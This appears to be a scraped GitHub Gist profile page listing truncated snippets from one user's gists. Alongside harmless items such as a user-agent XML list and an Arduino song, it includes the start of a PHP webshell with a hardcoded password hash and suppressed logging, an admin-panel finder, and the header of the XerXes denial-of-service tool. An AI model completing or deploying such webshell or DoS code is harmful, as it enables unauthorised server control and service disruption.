Skip to content

Instantly share code, notes, and snippets.

View Cvar1984's full-sized avatar
⚠️
This account is under NSA investigation

Bellatrix Lugosi Cvar1984

⚠️
This account is under NSA investigation
View GitHub Profile
@Cvar1984
Cvar1984 / useragentswitcher.xml
Created April 1, 2018 18:32
Massive list of user agents for User Agent Switcher by Chris Pederik http://forums.chrispederick.com/categories/user-agent-switcher
<useragentswitcher>
<folder description="Browsers - Windows">
<folder description="Legacy Browsers">
<useragent description="Arora 0.6.0 - (Vista)" useragent="Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )" appcodename="" appname="" appversion="" platform="" vendor="" vendorsub=""/>
<useragent description="Avant Browser 1.2" useragent="Avant Browser/1.2.789rel1 (http://www.avantbrowser.com)" appcodename="" appname="" appversion="" platform="" vendor="" vendorsub=""/>
<useragent description="Chrome 4.0.249.0 (Win 7)" useragent="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.5" appcodename="" appname="" appversion="" platform="" vendor="" vendorsub=""/>
<useragent description="Chrome 5.0.310.0 (Server 2003)" useragent="Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9" appcodename="" appname=""
@Cvar1984
Cvar1984 / 7c.php
Created April 25, 2018 18:59
7c Webshell
<?php
$auth_pass="d448da3672ffd8eb081f4687a20ebe21"; // Default Pass : 7c
session_start();
error_reporting(0);
set_time_limit(0);
@clearstatcache();
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
<?php
function ambil($text,$sebelum,$sesudah) {
$text=" ".$text;
$ini=strpos($text, $sebelum);
if($ini == 0) return "";
$ini+=strlen($sebelum);
$panjang=strpos($text,$sesudah,$ini) - $ini;
return substr($text,$ini,$panjang);
}
$url="https://www.bukalapak.com/p/handphone/hp-smartphone/7fybvh-jual-sony-z5-e6683-3-32-gb-garansi-resmi-1-tahun";
#!/usr/bin/env php
<?php
@include(__DIR__ . '/vendor/autoload.php');
if(strtolower(substr(PHP_OS, 0, 3)) == 'win') {
$R = "";
$RR = "";
$G = "";
$GG = "";
$B = "";
$BB = "";
<?php
$url=$_POST['url'];
$pf=$_POST['pf'];
$act=$_POST['action'];
if(isset($act)) {
echo "
<center>
<form method='post' target='_blank' action='$url' enctype='multipart/form-data'>
<input type='file' name='$pf'>
<input type='submit' value='Upload'>
<center>
<form method="POST">
<input type='text' name='url'/><br/>
<input type='submit' name='action'/>
</form>
</center>
<?php
isset($_POST['action']) OR die();
$list=explode("\n",file_get_contents('https://raw.githubusercontent.com/the-c0d3r/admin-finder/master/wordlist.txt'));
$count = count($list);
@Cvar1984
Cvar1984 / loading.php
Created September 11, 2018 09:27
Metasploit PHP Progress Bar
#!/usr/bin/env php
<?php
if(strtolower(substr(PHP_OS, 0, 3)) == 'win') { // windows < 10 does not support color on terminal :'(
$R = "";
$G = "";
$B = "";
$X = "";
} else {
$R = "\e[91m";
$G = "\e[92m";
/* XerXes - Most powerful dos tool - THN (http://www.thehackernews.com) */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <netdb.h>
#include <signal.h>
#include <sys/socket.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <curl/curl.h>
int main(int argc, char *argv[])
{
if(argc != 2) {
fprintf(stderr,"Usage : %s <number phone>\n",argv[0]);
exit(1);
/* "He's A Pirate" / "Pirates of the Caribbean" Theme Song Playing
* By Xitang 2016.06.27
* Youtube in Action: https://youtu.be/sjPAj1lXgtk
*
* INSTRUCTION: Hook up Pin 10 to the positive side of a buzzer or a microphone, hook up
* any resistor to the negative side of a buzzer (to limit current & volume & to protect the pin),
* and then connect the other end of the resistor to ground pin. Upload the sketch and enjoy!
*
* Music notes of the song obtained from Easy Music (Great website)
* Link: http://easymusic.altervista.org/recorder-hes-a-pirate-pirates-of-caribbean-sheet-music-guitar-chords/